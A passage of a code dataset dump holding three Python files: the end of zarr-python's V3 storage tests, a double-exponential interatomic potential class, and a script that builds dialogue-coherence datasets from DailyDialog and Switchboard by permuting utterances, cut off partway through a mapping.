StoreV3Tests):\n\n\nclass TestZipStoreV3(_TestZipStore, StoreV3Tests):\n\n ZipStoreClass = ZipStoreV3\n\n def create_store(self, **kwargs):\n path = mktemp(suffix=\".zip\")\n atexit.register(os.remove, path)\n store = ZipStoreV3(path, mode=\"w\", **kwargs)\n return store\n\n\nclass TestDBMStoreV3(_TestDBMStore, StoreV3Tests):\n def create_store(self, dimension_separator=None):\n path = mktemp(suffix=\".anydbm\")\n atexit.register(atexit_rmglob, path + \"*\")\n # create store using default dbm implementation\n store = DBMStoreV3(path, flag=\"n\", dimension_separator=dimension_separator)\n return store\n\n\nclass TestDBMStoreV3Dumb(_TestDBMStoreDumb, StoreV3Tests):\n def create_store(self, **kwargs):\n path = mktemp(suffix=\".dumbdbm\")\n atexit.register(atexit_rmglob, path + \"*\")\n\n import dbm.dumb as dumbdbm\n\n store = DBMStoreV3(path, flag=\"n\", open=dumbdbm.open, **kwargs)\n return store\n\n\nclass TestDBMStoreV3Gnu(_TestDBMStoreGnu, StoreV3Tests):\n def create_store(self, **kwargs):\n gdbm = pytest.importorskip(\"dbm.gnu\")\n path = mktemp(suffix=\".gdbm\") # pragma: no cover\n atexit.register(os.remove, path) # pragma: no cover\n store = DBMStoreV3(\n path, flag=\"n\", open=gdbm.open, write_lock=False, **kwargs\n ) # pragma: no cover\n return store # pragma: no cover\n\n\nclass TestDBMStoreV3NDBM(_TestDBMStoreNDBM, StoreV3Tests):\n def create_store(self, **kwargs):\n ndbm = pytest.importorskip(\"dbm.ndbm\")\n path = mktemp(suffix=\".ndbm\") # pragma: no cover\n atexit.register(atexit_rmglob, path + \"*\") # pragma: no cover\n store = DBMStoreV3(path, flag=\"n\", open=ndbm.open, **kwargs) # pragma: no cover\n return store # pragma: no cover\n\n\nclass TestDBMStoreV3BerkeleyDB(_TestDBMStoreBerkeleyDB, StoreV3Tests):\n def create_store(self, **kwargs):\n bsddb3 = pytest.importorskip(\"bsddb3\")\n path = mktemp(suffix=\".dbm\")\n atexit.register(os.remove, path)\n store = DBMStoreV3(path, flag=\"n\", open=bsddb3.btopen, write_lock=False, **kwargs)\n return store\n\n\nclass TestLMDBStoreV3(_TestLMDBStore, StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"lmdb\")\n path = mktemp(suffix=\".lmdb\")\n atexit.register(atexit_rmtree, path)\n buffers = True\n store = LMDBStoreV3(path, buffers=buffers, **kwargs)\n return store\n\n\nclass TestSQLiteStoreV3(_TestSQLiteStore, StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"sqlite3\")\n path = mktemp(suffix=\".db\")\n atexit.register(atexit_rmtree, path)\n store = SQLiteStoreV3(path, **kwargs)\n return store\n\n\nclass TestSQLiteStoreV3InMemory(_TestSQLiteStoreInMemory, StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"sqlite3\")\n store = SQLiteStoreV3(\":memory:\", **kwargs)\n return store\n\n\n@skip_test_env_var(\"ZARR_TEST_MONGO\")\nclass TestMongoDBStoreV3(StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"pymongo\")\n store = MongoDBStoreV3(\n host=\"127.0.0.1\", database=\"zarr_tests\", collection=\"zarr_tests\", **kwargs\n )\n # start with an empty store\n store.clear()\n return store\n\n\n@skip_test_env_var(\"ZARR_TEST_REDIS\")\nclass TestRedisStoreV3(StoreV3Tests):\n def create_store(self, **kwargs):\n # TODO: this is the default host for Redis on Travis,\n # we probably want to generalize this though\n pytest.importorskip(\"redis\")\n store = RedisStoreV3(host=\"localhost\", port=6379, **kwargs)\n # start with an empty store\n store.clear()\n return store\n\n\n@pytest.mark.skipif(not v3_sharding_available, reason=\"sharding is disabled\")\nclass TestStorageTransformerV3(TestMappingStoreV3):\n def create_store(self, **kwargs):\n inner_store = super().create_store(**kwargs)\n dummy_transformer = DummyStorageTransfomer(\n \"dummy_type\", test_value=DummyStorageTransfomer.TEST_CONSTANT\n )\n sharding_transformer = ShardingStorageTransformer(\n \"indexed\",\n chunks_per_shard=2,\n )\n path = \"bla\"\n init_array(\n inner_store,\n path=path,\n shape=1000,\n chunks=100,\n dimension_separator=\".\",\n storage_transformers=[dummy_transformer, sharding_transformer],\n )\n store = Array(store=inner_store, path=path).chunk_store\n store.erase_prefix(\"data/root/bla/\")\n store.clear()\n return store\n\n def test_method_forwarding(self):\n store = self.create_store()\n inner_store = store.inner_store.inner_store\n assert store.list() == inner_store.list()\n assert store.list_dir(data_root) == inner_store.list_dir(data_root)\n\n assert store.is_readable()\n assert store.is_writeable()\n assert store.is_listable()\n inner_store._readable = False\n inner_store._writeable = False\n inner_store._listable = False\n assert not store.is_readable()\n assert not store.is_writeable()\n assert not store.is_listable()\n\n\nclass TestLRUStoreCacheV3(_TestLRUStoreCache, StoreV3Tests):\n\n CountingClass = CountingDictV3\n LRUStoreClass = LRUStoreCacheV3\n\n\n@skip_test_env_var(\"ZARR_TEST_ABS\")\nclass TestABSStoreV3(_TestABSStore, StoreV3Tests):\n\n ABSStoreClass = ABSStoreV3\n\n\ndef test_normalize_store_arg_v3(tmpdir):\n\n fn = tmpdir.join(\"store.zip\")\n store = normalize_store_arg(str(fn), zarr_version=3, mode=\"w\")\n assert isinstance(store, ZipStoreV3)\n assert \"zarr.json\" in store\n\n # can't pass storage_options to non-fsspec store\n with pytest.raises(ValueError):\n normalize_store_arg(str(fn), zarr_version=3, mode=\"w\", storage_options={\"some\": \"kwargs\"})\n\n if have_fsspec:\n import fsspec\n\n path = tempfile.mkdtemp()\n store = normalize_store_arg(\"file://\" + path, zarr_version=3, mode=\"w\")\n assert isinstance(store, FSStoreV3)\n assert \"zarr.json\" in store\n\n store = normalize_store_arg(fsspec.get_mapper(\"file://\" + path), zarr_version=3)\n assert isinstance(store, FSStoreV3)\n\n # regression for https://github.com/zarr-developers/zarr-python/issues/1382\n # contents of zarr.json are not important for this test\n out = {\"version\": 1, \"refs\": {\"zarr.json\": \"{...}\"}}\n store = normalize_store_arg(\n \"reference://\", storage_options={\"fo\": out, \"remote_protocol\": \"memory\"}, zarr_version=3\n )\n assert isinstance(store, FSStoreV3)\n\n fn = tmpdir.join(\"store.n5\")\n with pytest.raises(NotImplementedError):\n normalize_store_arg(str(fn), zarr_version=3, mode=\"w\")\n\n # error on zarr_version=3 with a v2 store\n with pytest.raises(ValueError):\n normalize_store_arg(KVStore(dict()), zarr_version=3, mode=\"w\")\n\n # error on zarr_version=2 with a v3 store\n with pytest.raises(ValueError):\n normalize_store_arg(KVStoreV3(dict()), zarr_version=2, mode=\"w\")\n\n\nclass TestConsolidatedMetadataStoreV3(_TestConsolidatedMetadataStore):\n\n version = 3\n ConsolidatedMetadataClass = ConsolidatedMetadataStoreV3\n\n @property\n def metadata_key(self):\n return meta_root + \"consolidated/.zmetadata\"\n\n def test_bad_store_version(self):\n with pytest.raises(ValueError):\n self.ConsolidatedMetadataClass(KVStore(dict()))\n\n\ndef test_get_hierarchy_metadata():\n store = KVStoreV3({})\n\n # error raised if 'jarr.json' is not in the store\n with pytest.raises(ValueError):\n _get_hierarchy_metadata(store)\n\n store[\"zarr.json\"] = _default_entry_point_metadata_v3\n assert _get_hierarchy_metadata(store) == _default_entry_point_metadata_v3\n\n # ValueError if only a subset of keys are present\n store[\"zarr.json\"] = {\"zarr_format\": \"https://purl.org/zarr/spec/protocol/core/3.0\"}\n with pytest.raises(ValueError):\n _get_hierarchy_metadata(store)\n\n # ValueError if any unexpected keys are present\n extra_metadata = copy.copy(_default_entry_point_metadata_v3)\n extra_metadata[\"extra_key\"] = \"value\"\n store[\"zarr.json\"] = extra_metadata\n with pytest.raises(ValueError):\n _get_hierarchy_metadata(store)\n\n\ndef test_top_level_imports():\n for store_name in [\n \"ABSStoreV3\",\n \"DBMStoreV3\",\n \"KVStoreV3\",\n \"DirectoryStoreV3\",\n \"LMDBStoreV3\",\n \"LRUStoreCacheV3\",\n \"MemoryStoreV3\",\n \"MongoDBStoreV3\",\n \"RedisStoreV3\",\n \"SQLiteStoreV3\",\n \"ZipStoreV3\",\n ]:\n if v3_api_available:\n assert hasattr(zarr, store_name) # pragma: no cover\n else:\n assert not hasattr(zarr, store_name) # pragma: no cover\n\n\ndef _get_public_and_dunder_methods(some_class):\n return set(\n name\n for name, _ in inspect.getmembers(some_class, predicate=inspect.isfunction)\n if not name.startswith(\"_\") or name.startswith(\"__\")\n )\n\n\ndef test_storage_transformer_interface():\n store_v3_methods = _get_public_and_dunder_methods(StoreV3)\n store_v3_methods.discard(\"__init__\")\n # Note, getitems() isn't mandatory when get_partial_values() is available\n store_v3_methods.discard(\"getitems\")\n storage_transformer_methods = _get_public_and_dunder_methods(StorageTransformer)\n storage_transformer_methods.discard(\"__init__\")\n storage_transformer_methods.discard(\"get_config\")\n assert storage_transformer_methods == store_v3_methods\n","repo_name":"zarr-developers/zarr-python","sub_path":"zarr/tests/test_storage_v3.py","file_name":"test_storage_v3.py","file_ext":"py","file_size_in_byte":23175,"program_lang":"python","lang":"en","doc_type":"code","stars":1249,"dataset":"github-code","pt":"82"} +{"seq_id":"19594605011","text":"#!/usr/bin/env python3\n\nfrom mendeleev import element # For looking up atomic numbers, etc\nimport numpy as np\n\nfrom base_pot import PotProvider\n\n# This is a map of pairs to parameters\n# Parameters for the standard SAFARI Double exponential\nDE_Params = {}\n\n# Here are some example parameters\nDE_Params['Au-Au'] = [44.691, 1.164, 40987.591, 4.537]\nDE_Params['Na-Au'] = [4153.6, 3.625, 27017.57, 7.286]\nDE_Params['Na-Cu'] = [2051.73, 3.753, 11163.2, 6.877]\n\nclass DE(PotProvider):\n\n def V_r(self, A, B, r):\n pair = A+'-'+B\n if not pair in DE_Params:\n pair = B+'-'+A\n if not pair in DE_Params:\n print(\"Unknown Pair {}\".format(pair))\n exit()\n params = DE_Params[pair]\n a = params[0]\n b = params[1]\n c = params[2]\n d = params[3]\n return a * np.exp(-b * r) + c * np.exp(-d * r)\n\n def dV_dr(self, A, B, r):\n pair = A+'-'+B\n if not pair in DE_Params:\n pair = B+'-'+A\n if not pair in DE_Params:\n print(\"Unknown Pair {}\".format(pair))\n exit()\n params = DE_Params[pair]\n a = params[0]\n b = params[1]\n c = params[2]\n d = params[3]\n return b * a * np.exp(-b * r) + d * c * np.exp(-d * r)\n\n def name(self):\n return \"Double Exponential\"\n\n def abbrv(self):\n return \"DE\"","repo_name":"SINS-Lab/SEA-SAFARI","sub_path":"utility_scripts/potential_generation/DE.py","file_name":"DE.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"86584084312","text":"import math\nimport os\nfrom copy import deepcopy\nfrom ast import literal_eval\nimport pandas as pd\nfrom math import factorial\nimport random\nfrom collections import Counter, defaultdict\nimport sys\nfrom nltk import word_tokenize\nfrom tqdm import tqdm, trange\nimport argparse\nimport numpy as np\nimport re\nimport csv\nfrom sklearn.model_selection import train_test_split\n\nfrom swda.swda import CorpusReader, Transcript, Utterance\n\nact2word = {1:\"inform\",2:\"question\", 3:\"directive\", 4:\"commissive\"}\n\ndef permute(sents, sent_DAs, amount):\n \"\"\" return a list of different! permuted sentences and their respective dialog acts \"\"\"\n \"\"\" if amount is greater than the possible amount of permutations, only the uniquely possible ones are returned \"\"\"\n assert len(sents) == len(sent_DAs), \"length of permuted sentences and list of DAs must be equal\"\n\n if amount == 0:\n return []\n\n permutations = [list(range(len(sents)))]\n amount = min(amount, factorial(len(sents))-1)\n for i in range(amount):\n permutation = np.random.permutation(len(sents))\n while permutation.tolist() in permutations:\n permutation = np.random.permutation(len(sents))\n\n permutations.append(permutation.tolist())\n return permutations[1:] #the first one is the original, which was included s.t. won't be generated\n\ndef draw_rand_sent(act_utt_df, sent_len, amount):\n \"\"\" df is supposed to be a pandas dataframe with colums 'act' and 'utt' (utterance), \n with act being a number from 1 to 4 and utt being a sentence \"\"\"\n\n permutations = []\n for _ in range(amount):\n (utt, da, name, ix) = draw_rand_sent_from_df(act_utt_df)\n sent_insert_ix = random.randint(0, sent_len-1)\n permutations.append((utt, da, name, ix, sent_insert_ix))\n return permutations\n\ndef draw_rand_sent_from_df(df):\n ix = random.randint(0, len(df['utt'])-1)\n return literal_eval(df['utt'][ix]), df['act'][ix], df['dialogue'][ix], df['ix'][ix]\n\ndef half_perturb(sents, sent_DAs, amount):\n assert len(sents) == len(sent_DAs), \"length of permuted sentences and list of DAs must be equal\"\n\n permutations = [list(range(len(sents)))]\n\n for _ in range(amount):\n while True:\n speaker = random.randint(0,1) # choose one of the speakers\n speaker_ix = list(filter(lambda x: (x-speaker) % 2 == 0, range(len(sents))))\n\n permuted_speaker_ix = np.random.permutation(speaker_ix)\n new_sents = list(range(len(sents)))\n for (i_to, i_from) in zip(speaker_ix, permuted_speaker_ix):\n new_sents[i_to] = i_from\n\n if (not new_sents == permutations[0]) and (\n not new_sents in permutations or len(permutations) > math.factorial(len(speaker_ix))):\n permutations.append(new_sents)\n break\n\n return permutations[1:]\n\ndef utterance_insertions(length, amount):\n possible_permutations = []\n original = list(range(length))\n for ix in original:\n for y in range(length):\n if ix == y: continue\n\n ix_removed = original[0:ix] + ([] if ix == length-1 else original[ix+1:])\n ix_removed.insert(y, ix)\n possible_permutations.append(deepcopy(ix_removed))\n\n permutations = []\n for _ in range(amount):\n i = random.randint(0, len(possible_permutations)-1)\n permutations.append(possible_permutations[i])\n\n return permutations\n\nclass DailyDialogConverter:\n def __init__(self, data_dir, tokenizer, word2id, task='', ranking_dataset = True):\n self.data_dir = data_dir\n self.act_utt_file = os.path.join(data_dir, 'act_utt_name.txt')\n\n self.tokenizer = tokenizer\n self.word2id = word2id\n self.output_file = None\n self.task = task\n self.ranking_dataset = ranking_dataset\n self.perturbation_statistics = 0\n\n self.setname = os.path.split(data_dir)[1]\n assert self.setname == 'train' or self.setname == 'validation' or self.setname == 'test', \"wrong data dir name\"\n\n def create_act_utt(self):\n dial_file = os.path.join(self.data_dir, \"dialogues_{}.txt\".format(self.setname))\n act_file = os.path.join(self.data_dir, \"dialogues_act_{}.txt\".format(self.setname))\n output_file = os.path.join(self.data_dir, 'act_utt_name.txt'.format(self.task))\n\n df = open(dial_file, 'r')\n af = open(act_file, 'r')\n of = open(output_file, 'w')\n csv_writer = csv.writer(of, delimiter='|')\n\n for line_count, (dial, act) in tqdm(enumerate(zip(df, af)), total=11118):\n seqs = dial.split('__eou__')\n seqs = seqs[:-1]\n\n if len(seqs) < 5:\n continue\n\n tok_seqs = [self.tokenizer(seq) for seq in seqs]\n tok_seqs = [[w.lower() for w in utt] for utt in tok_seqs]\n tok_seqs = [self.word2id(seq) for seq in tok_seqs]\n\n acts = act.split(' ')\n acts = acts[:-1]\n acts = [int(act) for act in acts]\n\n for utt_i, (act, utt) in enumerate(zip(acts, tok_seqs)):\n dialog_name = \"{}_{}\".format(self.setname, line_count)\n row = (act, utt, dialog_name,utt_i)\n csv_writer.writerow(row)\n\n def convert_dset(self, amounts):\n # data_dir is supposed to be the dir with the respective train/test/val-dataset files\n print(\"Creating {} perturbations for task {}\".format(amounts, self.task))\n\n dial_file = os.path.join(self.data_dir, \"dialogues_{}.txt\".format(self.setname))\n act_file = os.path.join(self.data_dir, \"dialogues_act_{}.txt\".format(self.setname))\n self.output_file = os.path.join(self.data_dir, 'coherency_dset_{}.txt'.format(self.task))\n\n root_data_dir = os.path.split(self.data_dir)[0]\n shuffled_path = os.path.join(root_data_dir, \"shuffled_{}\".format(self.task))\n if not os.path.isdir(shuffled_path):\n os.mkdir(shuffled_path)\n\n assert os.path.isfile(dial_file) and os.path.isfile(act_file), \"could not find input files\"\n assert os.path.isfile(self.act_utt_file), \"missing act_utt.txt in data_dir\"\n\n with open(self.act_utt_file, 'r') as f:\n act_utt_df = pd.read_csv(f, sep='|', names=['act','utt','dialogue','ix'])\n\n rand_generator = lambda: draw_rand_sent_from_df(act_utt_df)\n\n df = open(dial_file, 'r')\n af = open(act_file, 'r')\n of = open(self.output_file, 'w')\n\n discarded = 0\n\n for line_count, (dial, act) in tqdm(enumerate(zip(df, af)), total=11118):\n seqs = dial.split('__eou__')\n seqs = seqs[:-1]\n\n if len(seqs) < 5:\n discarded += 1\n continue\n\n tok_seqs = [self.tokenizer(seq) for seq in seqs]\n tok_seqs = [[w.lower() for w in utt] for utt in tok_seqs]\n tok_seqs = [self.word2id(seq) for seq in tok_seqs]\n\n acts = act.split(' ')\n acts = acts[:-1]\n acts = [int(act) for act in acts]\n\n if self.task == 'up':\n permuted_ixs = permute(tok_seqs, acts, amounts)\n elif self.task == 'us':\n permuted_ixs = draw_rand_sent(act_utt_df, len(tok_seqs), amounts)\n elif self.task == 'hup':\n permuted_ixs = half_perturb(tok_seqs, acts, amounts)\n elif self.task == 'ui':\n permuted_ixs = utterance_insertions(len(tok_seqs), amounts)\n\n shuffle_file = os.path.join(shuffled_path, \"{}_{}.csv\".format(self.setname, line_count))\n with open(shuffle_file, \"w\") as f:\n csv_writer = csv.writer(f)\n for perm in permuted_ixs:\n if self.task == 'us':\n (utt, da, name, ix, insert_ix) = perm\n row = [name, ix,insert_ix]\n csv_writer.writerow(row)\n else:\n csv_writer.writerow(perm)\n\n self.perturbation_statistics += len(permuted_ixs)\n\n if self.task == 'us':\n for p in permuted_ixs:\n (insert_sent, insert_da, name, ix, insert_ix) = p\n a = \" \".join([str(a) for a in acts])\n u = str(tok_seqs)\n p_a = deepcopy(acts)\n p_a[insert_ix] = insert_da\n pa = \" \".join([str(a) for a in p_a])\n p_u = deepcopy(tok_seqs)\n p_u[insert_ix] = self.word2id(insert_sent)\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n\n else:\n for p in permuted_ixs:\n a = \" \".join([str(a) for a in acts])\n u = str(tok_seqs)\n pa = [acts[i] for i in p]\n p_a = \" \".join([str(a) for a in pa])\n pu = [tok_seqs[i] for i in p]\n p_u = str(pu)\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n\n print(discarded)\n\nclass SwitchboardConverter:\n def __init__(self, data_dir, tokenizer, word2id, task='', seed=42):\n self.corpus = CorpusReader(data_dir)\n self.data_dir = data_dir\n self.tokenizer = tokenizer\n self.word2id = word2id\n self.task = task\n\n self.utt_num = 0\n for utt in self.corpus.iter_utterances():\n self.utt_num += 1\n\n self.trans_num = 0\n for trans in self.corpus.iter_transcripts():\n self.trans_num += 1\n\n self.da2num = switchboard_da_mapping()\n \n # CAUTION: make sure that for each task the seed is the same s.t. the splits will be the same!\n train_ixs, val_ixs = train_test_split(range(self.trans_num), shuffle=True, train_size=0.8, random_state=seed)\n val_ixs, test_ixs = train_test_split(val_ixs, shuffle=True, train_size=0.5, random_state=seed)\n self.train_ixs, self.val_ixs, self.test_ixs = train_ixs, val_ixs, test_ixs\n\n self.utt_da_pairs = []\n prev_da = \"%\"\n for i, utt in enumerate(self.corpus.iter_utterances()):\n sentence = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\",\n utt.text)\n\n sentence = self.word2id(self.tokenizer(sentence))\n act = utt.damsl_act_tag()\n if act == None: act = \"%\"\n if act == \"+\": act = prev_da\n\n _, swda_name = os.path.split(utt.swda_filename)\n swda_name = swda_name[:-4] if swda_name.endswith('.csv') else swda_name\n\n ix = utt.utterance_index\n\n self.utt_da_pairs.append((sentence, act, swda_name, ix))\n\n def draw_rand_sent(self):\n r = random.randint(0, len(self.utt_da_pairs)-1)\n return self.utt_da_pairs[r]\n\n def create_vocab(self):\n print(\"Creating Vocab file for Switchboard\")\n\n cnt = Counter()\n for utt in self.corpus.iter_utterances():\n sentence = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\",\n utt.text)\n sentence = self.tokenizer(sentence)\n for w in sentence:\n cnt[w] += 1\n\n itos_file = os.path.join(self.data_dir, \"itos.txt\")\n itosf = open(itos_file, \"w\")\n\n for (word, _) in cnt.most_common(25000):\n itosf.write(\"{}\\n\".format(word))\n\n\n #getKeysByValue\n def swda_permute(self, sents, amount, speaker_ixs):\n if amount == 0:\n return []\n\n permutations = [list(range(len(sents)))]\n segment_permutations = []\n amount = min(amount, factorial(len(sents))-1)\n segm_ixs = self.speaker_segment_ixs(speaker_ixs)\n segments = list(set(segm_ixs.values()))\n\n for i in range(amount):\n while True:\n permutation = []\n segm_perm = np.random.permutation(len(segments))\n segment_permutations.append(segm_perm)\n for segm_ix in segm_perm:\n utt_ixs = sorted(getKeysByValue(segm_ixs, segm_ix))\n permutation = permutation + utt_ixs\n\n if permutation not in permutations:\n break\n\n permutations.append(permutation)\n return permutations[1:] , segment_permutations #the first one is the original, which was included s.t. won't be generated\n\n def speaker_segment_ixs(self, speaker_ixs):\n i = 0\n segment_indices = dict()\n prev_speaker = speaker_ixs[0]\n for j,speaker in enumerate(speaker_ixs):\n if speaker != prev_speaker:\n prev_speaker = speaker\n i += 1\n segment_indices[j] = i\n return segment_indices\n\n def swda_half_perturb(self, amount, speaker_ixs):\n segm_ixs = self.speaker_segment_ixs(speaker_ixs)\n segments = list(set(segm_ixs.values()))\n segment_permutations = []\n permutations = [list(segm_ixs.keys())]\n for _ in range(amount):\n speaker = random.randint(0,1) # choose one of the speakers\n speaker_to_perm = list(filter(lambda x: (x-speaker) % 2 == 0, segments))\n speaker_orig = list(filter(lambda x: (x-speaker) % 2 != 0, segments))\n #TODO: rename either speaker_ix or speaker_ixs, they are something different, but the names are too close\n if len(speaker_to_perm) < 2:\n return []\n\n while True:\n permuted_speaker_ix = np.random.permutation(speaker_to_perm).tolist()\n\n new_segments = [None]*(len(speaker_orig)+len(permuted_speaker_ix))\n if speaker == 0 : \n new_segments[::2] = permuted_speaker_ix\n new_segments[1::2] = speaker_orig\n else:\n new_segments[1::2] = permuted_speaker_ix\n new_segments[::2] = speaker_orig\n segment_permutations.append(new_segments)\n\n permutation = []\n for segm_ix in new_segments:\n utt_ixs = sorted(getKeysByValue(segm_ixs, segm_ix))\n permutation = permutation + utt_ixs\n\n if not permutation in permutations:\n permutations.append(permutation)\n break\n\n return permutations[1:], segment_permutations\n\n def swda_utterance_insertion(self, speaker_ixs, amounts):\n segment_ixs = self.speaker_segment_ixs(speaker_ixs)\n segments = list(set(segment_ixs.values()))\n segment_permutations = []\n permutations = []\n\n i = 0\n for _ in range(amounts):\n while True: # actually: do ... while permutation not in permutations\n i_from = random.randint(0, len(segments)-1)\n i_to = random.randint(0, len(segments)-2)\n segm_perm = deepcopy(segments)\n rem_elem = segments[i_from]\n segm_perm = segm_perm[0:i_from] + segm_perm[i_from+1:]\n segm_perm = segm_perm[0:i_to] + [rem_elem] + segm_perm[i_to:]\n\n permutation = []\n for segm_ix in segm_perm:\n utt_ixs = sorted(getKeysByValue(segment_ixs, segm_ix))\n permutation = permutation + utt_ixs\n\n if permutation not in permutations:\n permutations.append(permutation)\n segment_permutations.append(segm_perm)\n break\n\n return permutations, segment_permutations\n\n def swda_utterance_sampling(self, speaker_ixs, amount):\n segm_ixs = self.speaker_segment_ixs(speaker_ixs)\n segments = list(set(segm_ixs.values()))\n\n permutations = []\n\n for i in range(amount):\n (sentence, act, swda_name, ix) = self.draw_rand_sent()\n insert_ix = random.choice(segments)\n permutations.append((sentence, act, swda_name, ix, insert_ix))\n\n return permutations\n\n def convert_dset(self, amounts):\n # create distinct train/validation/test files. they'll correspond to the created\n # splits from the constructor\n train_output_file = os.path.join(self.data_dir, 'train', 'coherency_dset_{}.txt'.format(self.task))\n val_output_file = os.path.join(self.data_dir, 'validation', 'coherency_dset_{}.txt'.format(self.task))\n test_output_file = os.path.join(self.data_dir, 'test', 'coherency_dset_{}.txt'.format(self.task))\n if not os.path.exists(os.path.join(self.data_dir, 'train')):\n os.makedirs(os.path.join(self.data_dir, 'train'))\n if not os.path.exists(os.path.join(self.data_dir, 'validation')):\n os.makedirs(os.path.join(self.data_dir, 'validation'))\n if not os.path.exists(os.path.join(self.data_dir, 'test')):\n os.makedirs(os.path.join(self.data_dir, 'test'))\n\n trainfile = open(train_output_file, 'w')\n valfile = open(val_output_file, 'w')\n testfile = open(test_output_file, 'w')\n\n shuffled_path = os.path.join(self.data_dir, \"shuffled_{}\".format(self.task))\n if not os.path.isdir(shuffled_path):\n os.mkdir(shuffled_path)\n\n for i,trans in enumerate(tqdm(self.corpus.iter_transcripts(display_progress=False), total=1155)):\n utterances = []\n acts = []\n speaker_ixs = []\n prev_act = \"%\"\n for utt in trans.utterances:\n sentence = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\",\n utt.text)\n sentence = self.word2id(self.tokenizer(sentence))\n utterances.append(sentence)\n act = utt.damsl_act_tag()\n if act == None: act = \"%\"\n if act == \"+\": act = prev_act\n acts.append(self.da2num[act])\n prev_act = act\n if \"A\" in utt.caller:\n speaker_ixs.append(0)\n else:\n speaker_ixs.append(1)\n\n if self.task == 'up':\n permuted_ixs , segment_perms = self.swda_permute(utterances, amounts, speaker_ixs)\n elif self.task == 'us':\n permuted_ixs = self.swda_utterance_sampling(speaker_ixs, amounts)\n elif self.task == 'hup':\n permuted_ixs , segment_perms = self.swda_half_perturb(amounts, speaker_ixs)\n elif self.task == 'ui':\n permuted_ixs, segment_perms = self.swda_utterance_insertion(speaker_ixs, amounts)\n\n swda_fname = os.path.split(trans.swda_filename)[1]\n shuffle_file = os.path.join(shuffled_path, swda_fname) # [:-4]\n with open(shuffle_file, \"w\") as f:\n csv_writer = csv.writer(f)\n if self.task == 'us':\n for perm in permuted_ixs:\n (utt, da, name, ix, insert_ix) = perm\n row = [name, ix,insert_ix]\n csv_writer.writerow(row)\n else:\n for perm in segment_perms:\n csv_writer.writerow(perm)\n\n if self.task == 'us':\n for p in permuted_ixs:\n a = \" \".join([str(x) for x in acts])\n u = str(utterances)\n insert_sent, insert_da, name, ix, insert_ix = p\n insert_da = self.da2num[insert_da]\n p_a = deepcopy(acts)\n p_a[insert_ix] = insert_da\n pa = \" \".join([str(x) for x in p_a])\n p_u = deepcopy(utterances)\n p_u[insert_ix] = insert_sent\n\n if i in self.train_ixs:\n trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n if i in self.val_ixs:\n valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n if i in self.test_ixs:\n testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n\n else:\n for p in permuted_ixs:\n a = \" \".join([str(x) for x in acts])\n u = str(utterances)\n pa = [acts[i] for i in p]\n p_a = \" \".join([str(x) for x in pa])\n pu = [utterances[i] for i in p]\n p_u = str(pu)\n\n if i in self.train_ixs:\n trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n if i in self.val_ixs:\n valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n if i in self.test_ixs:\n testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--datadir\",\n required=True,\n type=str,\n help=\"\"\"The input directory where the files of the corpus\n are located. \"\"\")\n parser.add_argument(\"--corpus\",\n required=True,\n type=str,\n help=\"\"\"the name of the corpus to use, currently either 'DailyDialog' or 'Switchboard' \"\"\")\n parser.add_argument('--seed',\n type=int,\n default=42,\n help=\"random seed for initialization\")\n parser.add_argument('--amount',\n type=int,\n default=20,\n help=\"random seed for initialization\")\n parser.add_argument('--word2id',\n action='store_true',\n help= \"convert the words to ids\")\n parser.add_argument('--task',\n required=True,\n type=str,\n default=\"up\",\n help=\"\"\"for which task the dataset should be created.\n alternatives: up (utterance permutation)\n us (utterance sampling)\n hup (half utterance petrurbation)\n ui (utterance insertion, nothing directly added!)\"\"\")\n\n args = parser.parse_args()\n\n random.seed(args.seed)\n np.random.seed(args.seed)\n\n if args.word2id:\n f = open(os.path.join(args.datadir, \"itos.txt\"), \"r\")\n word2id_dict = dict()\n for i, word in enumerate(f):\n word2id_dict[word[:-1].lower()] = i\n\n word2id = lambda x: [word2id_dict[y] for y in x] # don't convert words to ids (yet). It gets done in the glove wrapper of mtl_coherence.py\n else:\n word2id = lambda x: x\n\n tokenizer = word_tokenize\n if args.corpus == 'DailyDialog':\n converter = DailyDialogConverter(args.datadir, tokenizer, word2id, task=args.task)\n converter.create_act_utt()\n elif args.corpus == 'Switchboard':\n converter = SwitchboardConverter(args.datadir, tokenizer, word2id, args.task, args.seed)\n converter.create_vocab()\n\n converter.convert_dset(amounts=args.amount)\n\ndef getKeysByValue(dictOfElements, valueToFind):\n listOfKeys = list()\n for item in dictOfElements.items():\n if item[1] == valueToFind:\n listOfKeys.append(item[0])\n return listOfKeys\n\ndef switchboard_da_mapping():\n mapping_dict = dict({\n \"sd\": 1,\n \"b\": 2,\n \"sv\": 3,\n \"aa\": 4,\n \"%-\": 